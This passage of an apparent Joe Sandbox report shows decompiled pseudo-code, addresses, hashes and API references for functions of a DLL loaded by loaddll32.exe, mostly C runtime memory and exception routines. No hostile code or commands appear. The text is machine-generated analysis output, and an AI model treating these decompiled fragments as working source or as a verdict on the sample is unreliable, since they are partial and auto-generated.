					E6D4A23CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6D4A2485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6D4A2370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6D4A23CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6D4A2467(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6d4a2268
0x6d4a2269
0x6d4a226a
0x6d4a226d
0x6d4a226f
0x6d4a2272
0x6d4a2273
0x6d4a2275
0x6d4a2276
0x6d4a2277
0x6d4a227a
0x6d4a2284
0x6d4a2335
0x6d4a233c
0x6d4a2345
0x6d4a228a
0x6d4a228a
0x6d4a2290
0x6d4a2296
0x6d4a2299
0x6d4a229c
0x6d4a22a0
0x6d4a22a5
0x6d4a22aa
0x6d4a232a
0x00000000
0x6d4a22ac
0x6d4a22ac
0x6d4a22b8
0x6d4a22ba
0x6d4a2315
0x6d4a2315
0x6d4a231b
0x00000000
0x6d4a22bc
0x6d4a22cb
0x6d4a22cd
0x6d4a22ce
0x6d4a22cf
0x6d4a22d2
0x6d4a22d2
0x6d4a22d4
0x00000000
0x6d4a22d6
0x6d4a22d6
0x6d4a2320
0x6d4a22d8
0x6d4a22d8
0x6d4a22dc
0x6d4a22e4
0x6d4a22e9
0x6d4a22ee
0x6d4a22fa
0x6d4a2302
0x6d4a2309
0x6d4a230f
0x6d4a2313
0x00000000
0x6d4a2313
0x6d4a22d6
0x6d4a22d4
0x00000000
0x6d4a22ba
0x6d4a232e
0x6d4a232e
0x6d4a232e
0x6d4a22aa
0x6d4a234a
0x6d4a2351

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: b8bb90e8d8c634acd42a3d93ff89b933f96e9a8df6e790725d22ac0131e7ea75
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 6021D6729042059BCB20DF79C8C0DABB7A5FF5A310B4A8068D9159F249DB30FE15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6D50AD7F, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1096943684.000000006D50A000.00000040.00020000.sdmp, Offset: 6D50A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d50a000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 647b40ec41668364d2a5d404cb7d1661cb79394e44e894827254da2d9bb81919
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: EC1181733401019FD758CE59DC81EA273DAFB993307298566ED04CB705E635EC52C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6D50B178, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1096943684.000000006D50A000.00000040.00020000.sdmp, Offset: 6D50A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d50a000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: d2fe2580fde15db9d2080ece72db7230a56ea1884563e33067def868dd043421
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: AE01F1763142018FE709EF2CE8C4E7ABBE4EBC6334F15C47EC54687A16D220E841CA20

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E061C, Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cbae3db621ff70c1e7d57ac94ad671dd91a9148fe17b3072832f0f506db7c86
Instruction ID: c6872f4da9661ff70204ce2606a1bb53e56fe85f9740c44472eea39dda8a56aa
Opcode Fuzzy Hash: 3cbae3db621ff70c1e7d57ac94ad671dd91a9148fe17b3072832f0f506db7c86
Instruction Fuzzy Hash: 78E08C32911278FBCB10CB99C900E8AB3ECFB84A85B25009AB615D3200C670DE00C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E2D42, Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6D4E2D86

Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C3A
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C4C
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C5E
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C70
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C82
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C94
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CA6
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CB8
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CCA
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CDC
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CEE
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4D00
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4D12

_free.LIBCMT ref: 6D4E2D7B

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E2D9D
_free.LIBCMT ref: 6D4E2DB2
_free.LIBCMT ref: 6D4E2DBD
_free.LIBCMT ref: 6D4E2DDF
_free.LIBCMT ref: 6D4E2DF2
_free.LIBCMT ref: 6D4E2E00
_free.LIBCMT ref: 6D4E2E0B
_free.LIBCMT ref: 6D4E2E43
_free.LIBCMT ref: 6D4E2E4A
_free.LIBCMT ref: 6D4E2E67
_free.LIBCMT ref: 6D4E2E7F

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 568347eea2d2b90a6c68f00e5c0b2d648ab6afcd9b3ae7505d8530913daeea9d
Instruction ID: 277729690970b8ab667a7af377833be38c685df301199059b0a0792b7c5bbe60
Opcode Fuzzy Hash: 568347eea2d2b90a6c68f00e5c0b2d648ab6afcd9b3ae7505d8530913daeea9d
Instruction Fuzzy Hash: 64313D31908213BFEB319A39D880F6773E5AF00396F218829E565DB290DF34EC40CA60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD9B0, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6D4DDAAB
type_info::operator==.LIBVCRUNTIME ref: 6D4DDAD2
___TypeMatch.LIBVCRUNTIME ref: 6D4DDBDE
CatchIt.LIBVCRUNTIME ref: 6D4DDC33
IsInExceptionSpec.LIBVCRUNTIME ref: 6D4DDCB9
_UnwindNestedFrames.LIBCMT ref: 6D4DDD40
CallUnexpected.LIBVCRUNTIME ref: 6D4DDD5B

Strings

csm, xrefs: 6D4DD9EB
csm, xrefs: 6D4DDB09
csm, xrefs: 6D4DDA58

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: c88dfd58291b27876d6d9f3e4a1026cdc6f2b43c06ef4391f1698c7e5a7b8aeb
Instruction ID: 176e4d4c6c2e9c8f131b534a43e6d06ade16242f21e31706bf85169b17c038fd
Opcode Fuzzy Hash: c88dfd58291b27876d6d9f3e4a1026cdc6f2b43c06ef4391f1698c7e5a7b8aeb
Instruction Fuzzy Hash: 61C1667180830A9BCF55CFA4C9A0EAEBBB4BF84718F11415AE9156B311D371EE52CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0198, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4E01AE

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E01BA
_free.LIBCMT ref: 6D4E01C5
_free.LIBCMT ref: 6D4E01D0
_free.LIBCMT ref: 6D4E01DB
_free.LIBCMT ref: 6D4E01E6
_free.LIBCMT ref: 6D4E01F1
_free.LIBCMT ref: 6D4E01FC
_free.LIBCMT ref: 6D4E0207
_free.LIBCMT ref: 6D4E0215

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98a57a5b51ee1af6fcc902e3a3fe9210ca30bb7c7e551208d2758686fa4a2458
Instruction ID: 7333431b6b7d2a748bf7151e560242e376712b2d2748dd78ed671c25f4c7171c
Opcode Fuzzy Hash: 98a57a5b51ee1af6fcc902e3a3fe9210ca30bb7c7e551208d2758686fa4a2458
Instruction Fuzzy Hash: 9321FF7A908119BFDF11DFA5C980DEE7BB8BF08285F41816AF6159B120EB35DA45CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E4DBC, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D4E4D84: _free.LIBCMT ref: 6D4E4DA9

_free.LIBCMT ref: 6D4E4E0A

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E4E15
_free.LIBCMT ref: 6D4E4E20
_free.LIBCMT ref: 6D4E4E74
_free.LIBCMT ref: 6D4E4E7F
_free.LIBCMT ref: 6D4E4E8A
_free.LIBCMT ref: 6D4E4E95

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 42c5e9fb9c8a107f3b8bf8ffb1c0d6ba7119298d49e70c01c512aecdb6b53527
Instruction ID: 2377be2a2ea238cda24e10525a1db54bc8df28070bb57ab9367c4e1821790458
Opcode Fuzzy Hash: 42c5e9fb9c8a107f3b8bf8ffb1c0d6ba7119298d49e70c01c512aecdb6b53527
Instruction Fuzzy Hash: 6A118431948B54B6D931EBB2CC45FEB77AC5F0C7D9F41482CA3AD66050EB24FD048A90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E3ECF, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6D4E3F17
__fassign.LIBCMT ref: 6D4E40F6
__fassign.LIBCMT ref: 6D4E4113
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D4E415B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D4E419B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D4E4247

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: a3722549f88305eaf50b6f9706584ce869abe3ba1b1fea4387abcdaf5d67026c
Instruction ID: c234f81b7afb385bdaf08188c61ce5f90c5fdf1f9abd39a9240603d34b4acaaa
Opcode Fuzzy Hash: a3722549f88305eaf50b6f9706584ce869abe3ba1b1fea4387abcdaf5d67026c
Instruction Fuzzy Hash: 74D18B71D04259AFCF15CFE8C880AEDBBB5BF49395F284169E869BB241D730AD06CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD679, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6D4DD288,6D4DB4EA,6D4DB7F2), ref: 6D4DD687
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D4DD695
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D4DD6AE
SetLastError.KERNEL32(00000000,?,6D4DD288,6D4DB4EA,6D4DB7F2), ref: 6D4DD700

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1cfb65accd97bfd254efd22606ae9ef946a57f7f1d061dffd374167ea91001fe
Instruction ID: 27faa6a5570bec9d8a88c1e4bfd2dae2f696f17ed23cde4d4ae8b3e8c3ba3f41
Opcode Fuzzy Hash: 1cfb65accd97bfd254efd22606ae9ef946a57f7f1d061dffd374167ea91001fe
Instruction Fuzzy Hash: 6101F13220E7136EEA8416789CB0F262674EB83679736423EF638862D4EF528C01C9D0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0FA2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6D4E0FA7

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: 8485b27fb4ba88a4c63cc48041d18d01d3502fb80163be4382c22dea556ffcc7
Instruction ID: fe9a874c504df374da96fcf93b0bc4fdc5246f18f872de6ea42a0c212c17a954
Opcode Fuzzy Hash: 8485b27fb4ba88a4c63cc48041d18d01d3502fb80163be4382c22dea556ffcc7
Instruction Fuzzy Hash: 3C21A4716482067FDB20DF768C80E6BB7ADEF413EA7114919F624E7A50EB30DD5087A1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E4D1B, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4E4D33

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E4D45
_free.LIBCMT ref: 6D4E4D57
_free.LIBCMT ref: 6D4E4D69
_free.LIBCMT ref: 6D4E4D7B

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fe5e775f17b681ccb50e5caf04730a911bdbac6678a20df1f3acec7a6b436baf
Instruction ID: 87609a9906461c223975c617c3859956e864a5d95ac905274ff42403ebee3eca
Opcode Fuzzy Hash: fe5e775f17b681ccb50e5caf04730a911bdbac6678a20df1f3acec7a6b436baf
Instruction Fuzzy Hash: 9CF03C32408255BBDE20DE65D0C0D7B73E9AA4A3D2366880DE168DBB00CF24FC808EA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0926, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4E0AC0

Strings

*?, xrefs: 6D4E0969

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: cae5a1d20d404d27c97126f5a7490949682a01efc8be1cbb21b7cc0484ab180d
Instruction ID: 84d1a3c2f1e42a49b9fbb3f91081446061c26815b60ba2295d3cd1d7bed5a214
Opcode Fuzzy Hash: cae5a1d20d404d27c97126f5a7490949682a01efc8be1cbb21b7cc0484ab180d
Instruction Fuzzy Hash: 91614075D0421AAFDB15CFAAC8809EEFBF5FF48354B258169D864E7300DB359E418B90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E473A, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D4E3ECF: GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6D4E3F17

WriteFile.KERNEL32(?,00000000,6D4E27CC,?,00000000,?,?,?,6D4E275B,?,?,?,6D508130,0000002C,6D4E27CC,?), ref: 6D4E488B
GetLastError.KERNEL32 ref: 6D4E4895
__dosmaperr.LIBCMT ref: 6D4E48DA

Strings

['Nm, xrefs: 6D4E4875, 6D4E4864, 6D4E4854, 6D4E4844, 6D4E4808, 6D4E47EE, 6D4E47F2, 6D4E480D, 6D4E4849, 6D4E4859, 6D4E4869

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID: ['Nm
API String ID: 251514795-1572042932
Opcode ID: e2f413d9e491aa20e69625354c97f892c8c484af896b8404ac79454e40825215
Instruction ID: be01dc899dbaa7fcbc4affa0171e3af640204efa60aa4bc1744593fa648cb33f
Opcode Fuzzy Hash: e2f413d9e491aa20e69625354c97f892c8c484af896b8404ac79454e40825215
Instruction Fuzzy Hash: 5351E075A0421ABBEF01CBA8C880FEE7BB8BF4E3DAF120555E514A7251D770DD018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DDD66, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 6D4DDD8B
CatchIt.LIBVCRUNTIME ref: 6D4DDE71

Strings

RCC, xrefs: 6D4DDDA5
MOC, xrefs: 6D4DDD9D

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: cc8c67824a3ac36572c0d73191a3809fd92ff93fca4bcca1bd84a215e910309d
Instruction ID: f0e64566a6de7176826e379737fd5114846be050f947485f646a0af8f6c3028b
Opcode Fuzzy Hash: cc8c67824a3ac36572c0d73191a3809fd92ff93fca4bcca1bd84a215e910309d
Instruction Fuzzy Hash: 5041587190060AAFCF41CF94CC90EEE7BB5BF88304F258099EA19A7221D335AD50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD759, Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6D4DD820
___AdjustPointer.LIBCMT ref: 6D4DD843
___AdjustPointer.LIBCMT ref: 6D4DD8DF

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: af0339a9fd17988ac0b7f9a09f828bfb4dbeb6087244d90e1d271c16d1c821e3
Instruction ID: 73e83428b56918b278c83cafe28ad0634f5bd3342b488396aba04ea090308d2e
Opcode Fuzzy Hash: af0339a9fd17988ac0b7f9a09f828bfb4dbeb6087244d90e1d271c16d1c821e3
Instruction Fuzzy Hash: 1D51DF72909706AFEB568F14C8A0F7A77A4BF85714F24452DE9A197290D731EC41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E083A, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6D4E0E5C: _free.LIBCMT ref: 6D4E0E6A

Part of subcall function 6D4E1A36: WideCharToMultiByte.KERNEL32(?,00000000,6D4E27CC,00000000,00000001,?,_HNm,?,6D4E27CC,?,00000000,?,6D4E45CE,0000FDE9,00000000,?), ref: 6D4E1AD8

GetLastError.KERNEL32 ref: 6D4E08A2
__dosmaperr.LIBCMT ref: 6D4E08A9
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D4E08E8
__dosmaperr.LIBCMT ref: 6D4E08EF

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 1ac6c75cdf9def5779a8757a8501bbff243ebd136c1c43d40018c1bf8ba80cc5
Instruction ID: 21d260819395979812b9bbd63eb2df4e672626c9cd9e2db87c693ccd0176e6a5
Opcode Fuzzy Hash: 1ac6c75cdf9def5779a8757a8501bbff243ebd136c1c43d40018c1bf8ba80cc5
Instruction Fuzzy Hash: CB21747160861ABFAB109F678C80D6BB7ADFF413EA7158528E57897250EF30ED4087E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E1C59, Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90048043458cb529fc2dd9bf2d08777c91f28de660d77a6deb805bc36c011fbe
Instruction ID: 76227c668dfce68c6afca3ddfea8e4319b5ef131d245a6f4b917d9ce4e8b7302
Opcode Fuzzy Hash: 90048043458cb529fc2dd9bf2d08777c91f28de660d77a6deb805bc36c011fbe
Instruction Fuzzy Hash: B021DB71E85621B7DF1287649C84F6A37686F427E2B224115ED16E7381D730ED01C9D0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E02DC, Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6D4E4315,?,00000001,6D4E27CC,?,6D4E47D4,00000001,?,?,?,6D4E275B,?,?), ref: 6D4E02E1
_free.LIBCMT ref: 6D4E033E
_free.LIBCMT ref: 6D4E0374
SetLastError.KERNEL32(00000000,6D5090D0,000000FF,?,6D4E47D4,00000001,?,?,?,6D4E275B,?,?,?,6D508130,0000002C,6D4E27CC), ref: 6D4E037F

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 9c38bd28981f03e5c085df6a48f73f4d2ffe9dadb5f832b1f85bc84056eb3f0d
Instruction ID: bc7ff0b20d7f609026df3f0d8012ee6f409ee0379b525228fc4f6e7f9b639ad0
Opcode Fuzzy Hash: 9c38bd28981f03e5c085df6a48f73f4d2ffe9dadb5f832b1f85bc84056eb3f0d
Instruction Fuzzy Hash: D011A7362496067BDB31967A5C80F2B217A9BC23FBB2A422CF234962D5DF308C018550

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0433, Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,00000001,6D509096,6D4E06CB,6D4E0611,6D509094,?,6D4DC2F9,6D509096,6D509094,?,?,?,6D4DA14E,00000001,6D509098), ref: 6D4E0438
_free.LIBCMT ref: 6D4E0495
_free.LIBCMT ref: 6D4E04CB
SetLastError.KERNEL32(00000000,6D5090D0,000000FF,?,6D4DC2F9,6D509096,6D509094,?,?,?,6D4DA14E,00000001,6D509098), ref: 6D4E04D6

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: b64e5b7fbafcf05a747ec3a9c4068a87a75ceffc9f72b3c1ad50b841f1e782c6
Instruction ID: d2b9641afe75566c3df2180903c3c2a59ed5fbd2900c54d7c1ea34eb1fb69cbd
Opcode Fuzzy Hash: b64e5b7fbafcf05a747ec3a9c4068a87a75ceffc9f72b3c1ad50b841f1e782c6
Instruction Fuzzy Hash: F911AC366496023ADF11967ADD84F27227A9BC22F7B2A433CF638A62D0DF318C018550

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DE723, Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,6D4DE7E4,?,?,6D51AA24,00000000,?,6D4DE90F,00000004,6D5033BC,6D5033B4,6D5033BC,00000000), ref: 6D4DE7B3

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

